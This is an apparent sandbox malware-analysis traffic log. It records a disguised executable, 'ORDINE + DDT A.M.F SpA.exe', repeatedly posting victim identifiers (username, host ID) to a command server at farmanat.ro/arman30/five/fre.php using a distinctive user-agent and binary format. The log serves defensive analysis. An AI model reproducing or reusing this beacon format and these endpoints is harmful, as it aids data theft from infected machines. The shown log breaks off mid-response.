                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              362192.168.11.2050205176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:15.296670914 CET6821OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:15.330975056 CET6821OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:15.383550882 CET6822INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:14 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              363192.168.11.2050206176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:15.731164932 CET6822OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:15.764703035 CET6823OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:15.813746929 CET6823INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:14 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              364192.168.11.2050207176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:16.250456095 CET6824OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:16.283979893 CET6824OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:16.338984013 CET6824INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:15 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              365192.168.11.2050208176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:16.767595053 CET6825OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:16.801800966 CET6825OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:16.851677895 CET6826INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:15 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              366192.168.11.2050209176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:17.275024891 CET6826OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:17.308703899 CET6827OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:17.358135939 CET6827INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:16 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              367192.168.11.2050211176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:17.712223053 CET6834OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:17.746392012 CET6835OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:17.801593065 CET6835INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:16 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              368192.168.11.2050212176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:18.178122044 CET6836OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:18.211467981 CET6836OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:18.262248993 CET6836INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:17 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              369192.168.11.2050213176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:18.705661058 CET6837OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:18.739916086 CET6837OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:18.794755936 CET6838INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:17 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              37192.168.11.2049873176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:25.780947924 CET6362OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:25.814433098 CET6362OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:48:25.867208958 CET6362INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:24 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              370192.168.11.2050214176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:19.166858912 CET6838OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:19.201040983 CET6839OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:19.286577940 CET6839INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:18 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              371192.168.11.2050215176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:19.718416929 CET6840OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:19.752697945 CET6840OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:19.802609921 CET6840INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:18 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              372192.168.11.2050216176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:20.224991083 CET6841OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:20.258569956 CET6841OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:20.308312893 CET6842INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:19 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              373192.168.11.2050217176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:20.725136042 CET6842OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:20.758601904 CET6843OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:20.808254004 CET6843INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:19 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              374192.168.11.2050218176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:21.156398058 CET6844OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:21.190673113 CET6844OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:21.242856979 CET6844INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:20 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              375192.168.11.2050219176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:21.660669088 CET6845OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:21.694211960 CET6845OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:21.743335962 CET6846INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:20 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              376192.168.11.2050220176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:22.171066046 CET6846OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:22.205435991 CET6847OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:22.257762909 CET6847INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:21 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              377192.168.11.2050221176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:22.650389910 CET6848OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:22.684088945 CET6848OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:22.733273029 CET6848INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:21 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              378192.168.11.2050222176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:23.144422054 CET6849OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:23.178015947 CET6849OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:23.227411985 CET6850INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:22 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              379192.168.11.2050223176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:23.652940035 CET6850OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:23.687066078 CET6851OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:23.736828089 CET6851INHTTP/1.1 404 Not Found
                                              Server: nginx
